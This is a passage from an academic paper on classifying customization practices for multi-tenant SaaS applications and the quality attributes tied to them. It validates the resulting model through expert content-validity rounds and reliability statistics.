customization assessments (Sun et al., 2008; Samir & Darwish, 2016), especially when customization impacts the crucial features of SaaS (Walraven, 2014; Walraven et al., 2014; Joha & Janssen, 2012; Espadas et al., 2013). There is insufficient evidence in the available studies to assess the effect of software customization on SaaS attributes (Ali et al., 2019a). Accordingly, it is important that the type of customization be specified to assess the associated impact and risk (Chaumun et al., 2002) as the software quality are likely to be influenced by any change (Parthasarathy & Sharma, 2017; Parthasarathy & Sharma, 2016). Although several researchers have reported the need to consider the customization of SaaS applications, no clear effort has been made to categorize software customization types and practices in a multi-tenant context. Accordingly, research is required to establish a clear model that considers: (1) generic software customization types and a list of common practices for each client in the SaaS multi-tenant context, and (2) key quality attributes associated with customization. Evidence Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 2/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 of the content validity and reliability of the proposed model are reported in detail in this study. Two main calculations are considered for content validity: the item content validity index (I-CVI) of each customization practice and SaaS quality attributes, and the scale content validity index (S-CVI/Ave). Similarly, two quantities are evaluated to determine the internal consistency reliability of the model in this study: Cronbach’s alpha coefficient, and the corrected item-total correlation. The structure of this manuscript is as follows. The next section discusses the related works. The third section presents the conceptualization of the model. The fourth section explains the methodology used, whereas the fifth section reports the results of the conducted study, followed by a discussion in the sixth section and threats to validity in the seventh section. Finally, conclusions and future work are presented in the eighth section. RELATED WORK This study presents an approach iteratively to develop, refine, and improve a software customization model for SaaS quality that was initially constructed in (Ali et al., 2019b). The main components of this model are the customization types, common customization practices of each type, and quality attributes of SaaS applications associated with customization. To the best of our knowledge, no model based on these criteria has been developed and validated. However, in this section, we review the literature on generic SaaS customization options, followed by the literature on quality models for SaaS applications. SaaS customization Different types of customization based on the layers of SaaS architecture and customization objects have been suggested (Li, Shi & Li, 2009; Tsai & Sun, 2013; Al-Shardan & Ziani, 2015). Li, Shi & Li (2009) illustrated five types of customization: GUI customization, service customization, process customization, data customization, and cross-layer customization. Tsai & Sun (2013) considered the customization of GUI, service, process, data, and QoS. Al-Shardan & Ziani (2015) defined three different types of SaaS customization: user interface, workflow, and access control. Conversely, some studies classified SaaS customization based on how customization was performed. Tsai & Sun (2013) explained three types of customization: source code, composition, and configuration. Based on where the customizations are hosted and executed, the work of Müller et al. (2009) proposed three types of customization for multi-tenant SaaS applications: desktop integration, user-interface customization, and back-end customization. Moreover, Kabbedijk & Jansen (2011) identified the types of customization in a tenant base. Customization was classified as segment variability and tenant-oriented variability: in the former, customization is performed based on the requirements of a tenant community, whereas in the latter, it is performed based on the specific requirements of a tenant. The most closely related studies are listed and summarized in Table 1. As Table 1 indicates, although there were some generic customization approaches proposed for SaaS, they did not explicitly declare the common customization practices for each approach. In addition, several inconsistencies are found across all proposals. For Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 3/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Table 1 A summary of generic classification of SaaS Customization. References Customization type Based on Li, Shi & Li (2009) GUI , service , process, data and cross-layer SaaS architecture layers Tsai & Sun (2013) GUI, service, process, data and QoS SaaS architecture layers Source code, composition and configuration Manner of performing Al-Shardan & Ziani (2015) GUI, workflow and access control SaaS architecture layers Müller et al. (2009) UI customization, desktop in- tegration and back-end cus- tomization Manner of performing Kabbedijk & Jansen (2011) Segment Variability and Tenant-oriented Variability Tenant and Tenant’s community example, the term ‘‘user interface customization" is used in both (Tsai & Sun, 2013; Müller et al., 2009), but with different meanings. Additionally, these proposals argued for the relevance of this approach, yet they did not consider reporting a comprehensive validation either from academia or industry. SaaS quality Many studies have focused entirely on defining and identifying the quality attributes of SaaS applications. For instance, Khanjani et al. (2014) proposed a list of 33 quality attributes for SaaS and provided their definitions and Lee et al. (2009) proposed a comprehensive quality model for assessing SaaS cloud services. Based on ISO/IEC 9126 (Coallier, 2001), these authors identified characteristics and quality attributes and defined metrics to measure them. A systematic process was proposed by La & Kim (2009) to build a high-quality SaaS application, taking the main SaaS design criteria into consideration. Duarte Filho et al. (2013) proposed a ‘‘SaaS Quality" method for evaluating the quality of SaaS applications. The SaaS quality model, based on ISO/IEC 9126 (Coallier, 2001) and IT management models (Publications Service Management, 2008; IT Governance Institute, 2007), was generated as a part of the proposed method. Another related study extracted the critical quality attributes for SaaS reusability and identified SaaS reusability metrics for every quality attribute (Samir & Darwish, 2016). Cancian et al. (2010) have customized software quality models to fit the SaaS context, classifying the SaaS quality criteria for products and processes and identifying quality attributes for each class. Nadanam & Rajmohan (2012) proposed a QoS model for web services in cloud computing, similar to the work of (Lee et al., 2009). Some of these attributes have been included in the Lee model. However, these attributes only address a few relevant aspects; many other significant features remain to be considered. These two models focus largely on user perspectives. Table 2 summarizes all the SaaS quality models reported in this study. Although some works in Table 2 mention customizability as a quality attribute of SaaS applications, none of them focused on the quality attributes of SaaS applications associated with customization. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 4/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Table 2 A summary of proposed quality models for SaaS application. References Quality attributes Inspired by Khanjani et al. (2014) Reliability, resiliency, Accuracy, Efficiency, Service response time, Stability, Functionality, Customizability, Suitability, Accessibility, Learnability, Commonality, Multi-tenancy, Operability,Serviceability, Robustness, Data Integrity, Data privacy, Adaptability, Extensibility, Flexibility, Scalability, Changeability, Composability, Maintainability, Security Management, Composability and Availability. Service measurement index (CSMIC 2014) Lee et al. (2009) Efficiency, Reliability, scalability, availability and Reusability. ISO/IEC 9126 (Coallier, 2001) La & Kim (2009) Supporting commonality, supporting multi tenant’s access, accessible via Internet, thin client model, Functionality, High Reusability, High Availability and High Scalability. key characteristics desired properties of SaaS in (Espadas, Concha & Molina, 2008; Manford 2008) Duarte Filho et al. (2013) Functionality, Usability, Security, Performance, Support, Service Level, Portability ISO/IEC 9126 (Coallier, 2001), ITIL v3 (Management 2008) and COBIT 4.1 (TGI 2007), Samir & Darwish (2016) Understandability, Modularity, Composability, Complexity, Customizability,reliability, Availability, Efficiency. Literature analysis perfomed by the authors Cancian et al. (2010) Integrity,reliability, security, accessibility,requirements development and management, infrastructure capability, quality control, acquisition, testing, performance, utilization of standards, change control, interoperability,robustness, availability, maintenance, version control, technically competent in business, technically competent employees, prevision of continuity of service, scalability, help desk, process quality certification, governance,reputation. Literature analysis perfomed by the authors Nadanam & Rajmohan (2012) Availability,reliability, scalability, efficiency,reusability, understandability, publicity, adaptability and composability. Literature analysis perfomed by the authors CONCEPTUAL MODEL Based on a systematic mapping study (SMS) conducted by Ali et al. (2019), the proposed model was initially constructed from 46 customization practices and 13 quality attributes in the SaaS multi-tenant context. Each of the investigated customization practices was assigned to a customization approach (personalization, configuration, composition, modification, integration, and extension). These approaches were inferred from the most popular software customization proposals (Ali et al., 2019). The model presented in this study, as shown in Fig. 1, demonstrates the concept of all the approaches and SaaS quality. The purpose of the conceptual model is to analyze the variables in this study comprehensively. Personalization approach The personalization approach refers to all solutions that provide transparent customization without needing to inform users (Gilmore & Pine, 1997; Mathiassen & Sandberg, 2014; Sunikka & Bragge, 2008). Personalization involves gathering and analyzing datasets correlated to individuals and/or groups (Tsai, Shao & Li, 2010; Fan et al., 2015; Tsai, Huang & Shao, 2011; Truyen et al., 2012) accurately to implement services based on their Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 5/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Figure 1 Proposed model of this study. Full-size DOI: 10.7717/peerjcs.294/fig-1 current and common preferences (Tsai, Shao & Li, 2010; Fan et al., 2015; Truyen et al., 2012). Moreover, a set of potential services is offered by publicly available pre-structured templates from SaaS providers (Fan et al., 2015). The main data sources for personalization may be tenant or tenant communities (Tsai, Shao & Li, 2010). Recommendation mechanisms are often used with this approach to propose suitable services according to preferences, profiles, data, and service directories of the users (Tsai, Shao & Li, 2010; Fan et al., 2015). The personalization approach also considers the meaning (semantics) of user and community data (Tsai, Shao & Li, 2010; Fan et al., 2015) by employing runtime behavior adaptation facilities to adapt the behavior of SaaS applications to the performance context (Truyen et al., 2012; Xiaojun, Yongqing & Lanju, 2013; Aulbach et al., 2011). A summary of common customization practices related to personalization in the context of multi-tenant SaaS applications is given in Table 3. Configuration approach According to the configuration approach, solutions offer a predefined setting for the alteration of application functions within a predefined scope (Sun et al., 2008; Brehm, Heinzl & Markus, 2001; Parhizkar, 2016; Davenport, 1998). Diversity is usually maintained by establishing predefined parameters, options, and components, treating each user individually (Xin & Levina, 2008; Salih & Zang, 2016; Kabbedijk & Jansen, 2011). Each SaaS tenant has to be able to configure the application by employing techniques to modify the functions of the applications within established limits (Xin & Levina, 2008; Zhang et al., 2007; Li, Shi & Li, 2009). Meanwhile, SaaS providers have to develop sets of services and plugins with which tenants perform configurations (Zhao et al., 2014; Mohamed et al., 2014). This type of SaaS application must enable tenants to create or select features based on the template repository (Tsai, Shao & Li, 2010; Tsai, Huang & Shao, 2011; Saleh, Fouad Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 6/34 https://peerj.com https://doi.org/10.7717/peerjcs.294/fig-1 http://dx.doi.org/10.7717/peerj-cs.294 Table 3 Multi-tenant SaaS customization practices of Personalization approach. Id Customization practice References Par 1 Tenants profile Tsai, Shao & Li (2010), Fan et al. (2015), Tsai, Huang & Shao (2011), Truyen et al. (2012) Par 2 Tenants preferences Tsai, Shao & Li (2010), Fan et al. (2015), Truyen et al. (2012) Par 3 Tenants behavioral activities Fan et al. (2015), Truyen et al. (2012) Par 4 Service directory Fan et al. (2015) Par 5 Recommendation mechanism Tsai, Shao & Li (2010), Fan et al. (2015) Par 6 Semantics data Tsai, Shao & Li (2010), Fan et al. (2015) Par 7 Runtime personalization Truyen et al. (2012), Xiaojun, Yongqing & Lanju (2013), Aulbach et al. (2011) Par 8 Tenants and Tenants communities (Info source) Tsai, Shao & Li (2010) Table 4 Multi-tenant SaaS customization practices of Configuration approach. Id Customization practice References Con 1 Pre-defined parameters and options Xin & Levina (2008), Salih & Zang (2016), Kabbedijk & Jansen (2011) Con 2 Tenant configuration Interface Xin & Levina (2008), Zhang et al. (2007), Li, Shi & Li (2009) Con 3 Provider plugins Zhao et al. (2014), Mohamed et al. (2014) Con 4 Customization templates Tsai, Shao & Li (2010), Tsai, Huang & Shao (2011), Saleh, Fouad & Abu-Elkheir (2014), Ralph (2008), Chen, Li & Kong (2013), Ruehl & Andelfinger (2011), Tsai & Sun (2013) Con 5 Template repository Tsai, Huang & Shao (2011), Saleh, Fouad & Abu-Elkheir (2014), Tsai & Sun (2013) Con 6 Customization point Shahin (2014), Mietzner & Leymann (2008) Con 7 Feature selection Mohamed et al. (2014), Ying et al. (2010) Con 8 Runtime Configuration Xin & Levina (2008), Gey, Landuyt & Joosen (2015), Moens & De Turck (2014), Shi et al. (2009) Con 9 Features deactivation Nguyen, Colman & Han (2016), Moens et al. (2012) & Abu-Elkheir, 2014; Ralph, 2008; Chen, Li & Kong, 2013; Ruehl & Andelfinger, 2011; Tsai & Sun, 2013). A set of components, which accommodate a variety of tenant needs, is provided in the application template. By selecting a relevant component set, tenants can personalize each customization point (Shahin, 2014; Mietzner & Leymann, 2008). When a tenant wishes to subscribe to the SaaS application, the capabilities of each feature within the system are analyzed to determine whether they ought to be incorporated into the application (Mohamed et al., 2014; Ying et al., 2010). All configurations established by the tenants must be adapted during the applications runtime (Xin & Levina, 2008; Gey, Landuyt & Joosen, 2015; Moens & De Turck, 2014; Shi et al., 2009). In addition, a disabling or excluding option for some features could be provided (Nguyen, Colman & Han, 2016; Moens et al., 2012). Table 4 summarizes the common customization practices of the configuration approach in the context of multi-tenant SaaS applications. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 7/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Table 5 Multi-tenant SaaS customization practices of Composition approach. Id Customization practice References Com 1 Components consolidation and sharing Saleh, Fouad & Abu-Elkheir (2014), Moens et al. (2012), Moens, Dhoedt & De Turck (2015), Liu et al. (2010), Rico et al. (2016), Ruehl, Wache & Verclas (2013), Makki et al. (2016) Com 2 Runtime composition Moens et al. (2012), Moens, Dhoedt & De Turck (2015), Kumara et al. (2013), Mietzner, Leymann & Papazoglou (2008), Lee & Choi (2012) Com 3 Subcomponents composition Kumara et al. (2013), Schroeter et al. (2012), Kumara et al. (2015) Com 4 Decomposition Shahin (2014), Moens et al. (2012), Gey et al. (2014) Com 5 Components relationships Li, Shi & Li (2009), Shahin (2014), Moens, Dhoedt & De Turck (2015) Composition approach In this approach, the multiple interacting components of the SaaS application are consolidated and new components can be shared between tenants and end-users (Saleh, Fouad & Abu-Elkheir, 2014; Moens et al., 2012; Moens, Dhoedt & De Turck, 2015; Liu et al., 2010; Rico et al., 2016; Ruehl, Wache & Verclas, 2013; Makki et al., 2016). Different components of the SaaS applications that collaborate must be composed during runtime (Moens et al., 2012; Moens, Dhoedt & De Turck, 2015; Kumara et al., 2013; Mietzner, Leymann & Papazoglou, 2008; Lee & Choi, 2012). The final composition must take into consideration the subcomponents of the core application (Kumara et al., 2013; Schroeter et al., 2012; Kumara et al., 2015). The composition approach enables simplification of the consolidated SaaS components (Shahin, 2014; Moens et al., 2012; Gey et al., 2014) as the relationships and dependencies between them are considered (Li, Shi & Li, 2009; Shahin, 2014; Moens, Dhoedt & De Turck, 2015). Table 5 summarizes the common customization practices of the composition approach in the context of multi-tenant SaaS applications. Extension approach SaaS application can be extended by adding custom code to be compiled during runtime (Saleh, Fouad & Abu-Elkheir, 2014; Mietzner & Leymann, 2008; Correia, Penha & Da Cruz, 2013). Furthermore, a set of extension points, which permit a customized service to be plugged in, must be provided (Mietzner & Leymann, 2008; Correia, Penha & Da Cruz, 2013; Moens & De Turck, 2014; Salih & Zang, 2012). The SaaS provider should also supply an open platform and an API, which allows developers to compile custom code (replacements for existing objects or extensions to them) into the business object layers of the application (Zhao et al., 2014; Müller et al., 2009). Any extension to a SaaS application may be public or accessible only by an individual tenant (Aulbach et al., 2011). Table 6 summarizes the common customization practices of the extension approach in the context of multi-tenant SaaS. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 8/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Table 6 Multi-tenant SaaS customization practices of Extension approach. Id Customization practice References Ext 1 Custom code insertion Saleh, Fouad & Abu-Elkheir (2014), Mietzner & Leymann (2008), Correia, Penha & Da Cruz (2013) Ext 2 Extension points Mietzner & Leymann (2008), Correia, Penha & Da Cruz (2013) Ext 3 Runtime extension Moens & De Turck (2014), Salih & Zang (2012) Ext 4 Extension interface Zhao et al. (2014), Müller et al. (2009) Ext 5 Replacements of existing code Müller et al. (2009) Ext 6 Private/public extension Aulbach et al. (2011) Integration approach In this case, the SaaS application must be capable of incorporating extra services via external SaaS providers (Aulkemeier et al., 2016; Sun et al., 2007; Almorsy, Grundy & Ibrahim, 2012; Scheibler, Mietzner & Leymann, 2008). Most SaaS service customers assume that the SaaS application will merge easily with their in-house systems (Müller et al., 2009; Aulkemeier et al., 2016; Sun et al., 2007; Scheibler, Mietzner & Leymann, 2008; Zhang, Liu & Meng, 2009). However, this integration must consider nonfunctional elements, such as security controls, which should be accommodated by the applications architecture (Sun et al., 2007; Almorsy, Grundy & Ibrahim, 2012), at both design time and runtime (Aulkemeier et al., 2016; Sun et al., 2007). Integration platforms may present a service framework, responsible for assimilating services, and process frameworks, through which business processes can be executed (Aulkemeier et al., 2016; Sun et al., 2007). Any additional services from third-party SaaS providers must employ different programming languages and run in different environments (Scheibler, Mietzner & Leymann, 2008). In some cases, code or scripts will be utilized to incorporate these services (Aulkemeier et al., 2016). Incorporation requires an integration interface (Aulkemeier et al., 2016; Sun et al., 2007), synchronization toolkits, and data retrieval mechanisms to respond to the demands posed by integration (Sun et al., 2007; Zhang, Liu & Meng, 2009). In this study, the common customization practices related to the integration approach in the context of multi-tenant SaaS applications are summarized in Table 7. Modification approach This approach refers to techniques and solutions that alter the design or other functional requirements of the application by changing part of its source code (Luo & Strong, 2004; Haines, 2009). The modifications must consider the allocation of resources to take the customized code into account, thereby ensuring operational cost-efficiency regarding maintenance and resource sharing among tenants (Sun et al., 2008; Moens & De Turck, 2014; Helmich et al., 2009). SaaS vendors must manage all elements of customization codes for any individual tenant without developing unique versions for each (Sun et al., 2008). As a result, they should alter the code of the application when identical customizations are made by a considerable number of tenants (Sun et al., 2008; Moens & De Turck, 2014). Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 9/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Table 7 Multi-tenant SaaS customization practices of Integration approach. Id Customization practice References Int 1 Integration with another SaaS Mohamed et al. (2014), Aulkemeier et al. (2016), Sun et al. (2007), Almorsy, Grundy & Ibrahim (2012), Scheibler, Mietzner & Leymann (2008) Int 2 Integration with other on-premise applications Müller et al. (2009), Aulkemeier et al. (2016), Sun et al. (2007), Scheibler, Mietzner & Leymann (2008), Zhang, Liu & Meng (2009) Int 3 Non-functional integration Sun et al. (2007), Almorsy, Grundy & Ibrahim (2012) Int 4 Runtime integration Aulkemeier et al. (2016), Sun et al. (2007) Int 5 Service & process integration Aulkemeier et al. (2016), Sun et al. (2007) Int 6 Integration of different PL applications Scheibler, Mietzner & Leymann (2008) Int 7 Third party code injection Aulkemeier et al. (2016) Int 8 Integration interface Aulkemeier et al. (2016), Sun et al. (2007) Int 9 Synchronization & data retrieval tools Sun et al. (2007), Zhang, Liu & Meng (2009) Table 8 Multi-tenant SaaS customization practices of Modification approach. Id Customization practice References Mod 1 Source code modifications Sun et al. (2008), Moens & De Turck (2014), Helmich et al. (2009) Mod 2 Resources allocation for customized code Sun et al. (2008), Moens & De Turck (2014) Mod 3 Individual tenant basis Sun et al. (2008) Mod 4 Identical customizations Sun et al. (2008), Moens & De Turck (2014) Mod 5 Runtime Modification Moens & De Turck (2014) Mod 6 Dependency relationship of modified functions Dong et al. (2010) Mod 7 Namespaces, inheritance, and polymorphism Lee & Choi (2012) Mod 8 Add or changes methods or attributes Ziani & AlShehri (2015), Kong, Li & Zheng (2010) Mod 9 Deletion of custom objects, methods, or attributes Ziani & AlShehri (2015), Kong, Li & Zheng (2010) Runtime code changes must consider the interrelationship between different functions, as one function can depend on one or several other functions simultaneously (Dong et al., 2010). Namespaces, inheritance, and polymorphism are often used to implement source code customizations in this case (Lee & Choi, 2012). Source-code modifications are made by adding or deleting methods or attributes, or by changing the current implementation methods of the object (Ziani & AlShehri, 2015; Kong, Li & Zheng, 2010). Table 8 summarizes the common customization practices of the modification approach in the context of multi-tenant SaaS applications. SaaS quality The list of SaaS quality attributes in the proposed customization solutions for SaaS applications was provided in (Ali et al., 2019), but the attributes were not defined. Therefore, in this work, we focus on the definitions provided by (Khanjani et al., 2014), which have been evaluated and validated in a Ph D dissertation (Khanjani, 2015). Moreover, Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 10/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Table 9 Quality attributes of SaaS applications associated with customization. Id Quality attribute Defination References QA 1 Multi-tenancy SaaS services can support in- stances of simultaneous access by multiple users for multiple ten- ants. Khanjani et al. (2014), La & Kim (2009) QA 2 Scalability SaaS providers can manage growth or decline in the level of services. Khanjani et al. (2014), Lee et al. (2009), Nadanam & Rajmohan (2012), Zia & Khan (2012), Akojwar et al. (2012), CSMIC (2014) QA 3 Availability SaaS services can function within a specific time to satisfy users needs. Khanjani et al. (2014), Lee et al. (2009), Nadanam & Rajmohan (2012), Akojwar et al. (2012), CSMIC (2014), Cancian et al. (2010), Alhamad, Dillon & Chang (2010) QA 4 Reliability SaaS application maintains op- erating and functioning under given conditions without failure within a given time period. Khanjani et al. (2014), Lee et al. (2009), Nadanam & Rajmohan (2012), Akojwar et al. (2012), CSMIC (2014), Cancian et al. (2010), Alhamad, Dillon & Chang (2010) QA 5 Maintainability Modifications to the application are made by SaaS provider to re- tain it in the condition of good repair. Khanjani et al. (2014), CSMIC (2014), Cancian et al. (2010) QA 6 Security The effectiveness of SaaS provider’s controls on service data, access to the services, and the physical facilities from which service are provided. Khanjani et al. (2014), CSMIC (2014) QA 7 Usability The ease with which SaaS service can be used to achieve tenant- specific-goal. Khanjani et al. (2014), Alhamad, Dillon & Chang (2010) QA 8 Interoperability SaaS service can easily inter- act with other services from the same SaaS provider or other providers. Khanjani et al. (2014), CSMIC (2014), Cancian et al. (2010) QA 9 Efficiency SaaS services effectively utilize resources to perform their func- tions. Khanjani et al. (2014), Lee et al. (2009), Nadanam & Rajmohan (2012), Akojwar et al. (2012) QA 10 Functionality SaaS application provides an ex- tensive set of features. Khanjani et al. (2014), CSMIC (2014) QA 11 Accessibility SaaS services are operable by users with different disabilities. Khanjani et al. (2014), CSMIC (2014), Cancian et al. (2010) QA 12 Commonality SaaS services possess common features and are amenable to reuse by multiple users. Khanjani et al. (2014), La & Kim (2009), Lee et al. (2009), Nadanam & Rajmohan (2012) QA 13 Response time SaaS application adheres to a de- fined time limit between service request and service response. Khanjani et al. (2014), CSMIC (2014), Salama et al. (2012), Badidi (2013), Song et al. (2012), He et al. (2012), Wang et al. (2011) these definitions were compared with those available in the literature provided by other SaaS quality models. The identification and definitions of the quality attributes that play an important role in SaaS customization or could be influenced by customization are presented in Table 9. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 11/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Figure 2 Conceptual model of this study. Full-size DOI: 10.7717/peerjcs.294/fig-2 All the customization practices for each approach and the quality attributes associated with the relevant SaaS applications are presented in Fig. 2. In this study, all customization approaches are variables that may affect the quality of SaaS applications. In the remaining sections of this study, customization practices and quality attributes are labeled as items, while approaches and SaaS quality are labeled as ‘‘constructs". METHODOLOGY The methodology of this study is composed of three main phases, as indicated in Fig. 3. The first phase is the development of the customization model concept for SaaS quality, as presented in the previous section. The second and third phases consider the content validity and reliability of the model. Rounds of content validity Content validity is a vital topic for high-quality measurement (Wynd, Schmidt & Schaefer, 2003). It holds that each item has a requisite sample of aspects that depicts the construct of interest (Cohen, Manion & Morrison, 2002). In this study, this quantity was evaluated to validate the conceptual model. Content validity is generally determined based on the opinion of experts, who analyze if the model or instrument correctly depicts its concept (Bell, Bryman, & Harley, 2015; Hair et al., 2015), in the field. To validate the conceptual model, a questionnaire was elaborated and provided to researchers who had previous experience in the SaaS customization field. These researchers were identified through an extensive systematic mapping study and Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 12/34 https://peerj.com https://doi.org/10.7717/peerjcs.294/fig-2 http://dx.doi.org/10.7717/peerj-cs.294 Figure 3 Methodology phases of this study. Full-size DOI: 10.7717/peerjcs.294/fig-3 selected based on their published papers and affinity with this study, 224 researchers were identified (Ali et al., 2019). A cover letter describing the objective of the questionnaire and asking some personal information on the background of experts was attached. As the available literature on the classification and identification of software customization approaches and related quality attributes in the SaaS multi-tenant context is insufficient, we conducted iterative content validity evaluation as recommended by (Polit & Beck, 2006; Parratt et al., 2016; Harris & Holloway, 2012). While designing the data analysis for each round, we primarily followed the content validity index (CVI) method, which is the common method for this purpose (Bhatti & Ahsan, 2017), as guided by (Polit & Beck, 2006). The popularity of CVI is not only limited to educational, psychological, or nursing research, but also to other disciplines or research areas, such as researches in software engineering and information systems (Bhatti & Ahsan, 2017; Yilmaz et al., 2017; Wang et al., 2019). In this study, two quantities were calculated (Polit & Beck, 2006): 1. The item content validity index (I-CVI) for each item. 2. The scale content validity index (S-CVI/Ave), which is an average of the I-CVIs for each construct. Lynn (1986) suggests that at least three experts should be present to evaluate the model; however, more than ten experts would probably be unnecessary (Polit & Beck, 2006). Other scholars mention that at least five experts should be sufficient to validate the model (Zamanzadeh et al., 2015). Questionnaires that queried the relevance of each item with respect to its construct were, therefore, sent to a group of experts. As recommended by (Polit & Beck, 2006; Lynn, 1986; Davis, 1992), the respondent replied according to a 4-point ordinal scale in which 1, 2, 3 and 4 respectively corresponded to ‘‘not relevant’’, ‘‘somewhat relevant’’, ‘‘quite relevant’’, and ‘‘very relevant’’. The experts were also requested to provide further comments about each item and construct and about the overall model, including recommendations for improvement. After each round (after at least five experts had replied to the questionnaire), the inputs and suggestions were analyzed. Any item that was deemed unclear or did not meet the Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 13/34 https://peerj.com https://doi.org/10.7717/peerjcs.294/fig-3 http://dx.doi.org/10.7717/peerj-cs.294 I-CVI criteria was either revised or removed. The rounds were suspended when the S-CVI and I-CVI criteria were achieved: 1. I-CVI of 1.00 with 3 to 5 experts (Polit & Beck, 2006; Lynn, 1986). 2. I-CVI of 0.78 or higher for 6 to 10 experts (Polit & Beck, 2006; Lynn, 1986). 3. S-CVI of 0.80 or higher (Polit & Beck, 2006; Yamada et al., 2010). Our intention in round 1 was to revise the items that did not meet the I-CVI criteria rather than deleting them. The deletion of invalid items or constructs was left to the subsequent rounds. This strategy, therefore, allowed most of the items to be assessed more than one time. Furthermore, the CVI analysis in all rounds had to be supplemented by computation of the Kappa coefficient to remove possible chance agreement among the experts (Shrotryia & Dhanda, 2019; Polit & Beck, 2006). The evaluation criteria for Kappa are fair = k of 0.40–0.59, good = k of 0.60–0.74, and excellent = k > 0.74 (Zamanzadeh et al., 2014; Shrotryia & Dhanda, 2019; Polit & Beck, 2006). Reliability study After the content validity was established, a study was conducted to determine the reliability of the model. Thirty-four respondents from software engineering research groups, familiar with SaaS applications, were purposively sampled. They were from four Malaysian universities, namely Universiti Putra Malaysia, Universiti Kebangsaan Malaysia, Universiti Malaysia Pahang, and Universiti Tenaga Nasional. The reliability of the measured items used in the survey was examined using Cronbachs alpha internal consistency test. Its results range from 0 to 1, in which high numbers indicate high reliability. Values greater than 0.9 are excellent; between 0.8 and 0.9 are good; between 0.7 and 0.8 are acceptable; between 0.6 and 0.7 are questionable, and below 0.6 are poor (Sekaran & Bougie, 2016). The reliability of the research instrument or model is related to its consistency and stability (Sekaran & Bougie, 2016; Alkawsi, ALI & Alghushami, 2018). The reliability of the model was assessed using three quantities: 1. Cronbach’s alpha value for each construct must be 0.70 or above. 2. Corrected item-total correlation should exceed 0.2. 3. Cronbachs Alpha if Item deleted must be lower than that of Cronbach’s alpha for a construct. RESULTS The results of the content validity evaluation and consistency tests are reported in this section. Rounds of content validity We conducted two evaluation rounds for content validity between February 2019 and June 2019, starting with version 1 of the model produced in the conceptualization phase. It was revised after each round, generating versions 2 and 3. The versions 1, 2, and 3 questionnaires are provided in Appendices A–C. In round 1, the questionnaire was sent to the first 100 researchers identified by Ali et al. (2019); only five experts replied and completed the content validity questionnaire. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 14/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294#supp-1 http://dx.doi.org/10.7717/peerj-cs.294#supp-1 http://dx.doi.org/10.7717/peerj-cs.294 Table 10 Basic research-related information of the experts participated in round 1. No Designation Research expertise Experience 1 Researcher Software Engineering, Software Systems >5 2 Associate Professor Software Engineering <5 3 Professor Software Engineering, Software Tools, Model-driven Development >5 4 Associate Professor Software engineering >5 5 Researcher Software engineering, big data, AI <5 Table 11 Basic research-related information of the experts participated in round 2. No Designation Research expertise Experience 1 Assistant Professor Software Engineering >5 2 Professor Software Engineering >5 3 Researcher Software Engineering, Distributed & Cloud Computing >5 4 Researcher Software Engineering, Machine Learning <5 5 Associate Professor Software Engineering, Cloud Computing >5 6 Associate Professor Software engineering >5 Therefore, in round 2, we considered sending it to all the researchers identified by Ali et al. (2019) (including all the researchers who were addressed in round 1); only six experts replied. Tables 10 and 11 contain the basic research-related information of the experts who participated in rounds 1 and 2. Due to the satisfying level of consensus indicated by the I-CVI and S-CVI scores after the analysis of round 2, it was determined that an additional round was unnecessary; therefore, data collection was suspended. Table 12 demonstrates the level of consensus for each of the items in the two rounds as well as the initial 59 items and 7 constructs of round 1, and 56 items and 7 constructs of round 2. These items were deleted in round 1 for the following reasons: 1. Item Con 1 was removed as it was adequately measured by item Con 6, thus item Con 6 was retained as its I-CVI (0.8) was higher than item Con 1 (0.4). 2. Item Mod 7 was removed as it was applicable to all software developed with object- oriented approach. 3. Item Mod 9 was merged with item Mod 8 as they complement each other. In round 1, consensus (I-CVI >=1.00) was reached by the overall panel for 19 of the 59 items (32.20%). An I-CVI of 0.80 was attained for 24 items (40.68%) and 0.60 for 12 items (20.34%). In addition, an I-CVI of 0.40 was attained for only 4 of 59 items (6.78%). Figure 4 depicts the number of items in the I-CVI results. From our interpretation of the answers, the experts suggested that more refinement of the description was required for some items. The need for these refinements could have been avoided if the multi-tenancy concept was included. In round 2, the Id of each item was redefined to reflect the resulting list of items from round 1. Table 12 also displays the I-CVIs obtained from round 2. The 31, 17, 6, and 2 of Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 15/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Table 12 Results of I-CVI, S-CVI and Kappa within content validity rounds. Construct Round_1 Round_2 Item_1 I-CVI_1 Kappa S-CVI_1 Item_2 I-CVI_2 Kappa S-CVI_2 Per 1 0.4 0.13 Per 1 0.67 0.56 Per 2 0.8 0.76 Per 2 1 1.00 Per 3 0.8 0.76 Per 3 0.5 0.27 Per 4 0.8 0.76 Per 4 0.67 0.56 Per 5 0.8 0.76 Per 5 0.67 0.56 Per 6 0.8 0.76 Per 6 0.67 0.56 Per 7 1 1.00 Per 7 0.83 0.82 Personalization a Per 8 1 1.00 0.8 Per 8 0.83 0.82 0.72 Con 1 0.4 0.13 Con 1 1 1.00 Con 2 0.8 0.76 Con 2 1 1.00 Con 3 1 1.00 Con 3 1 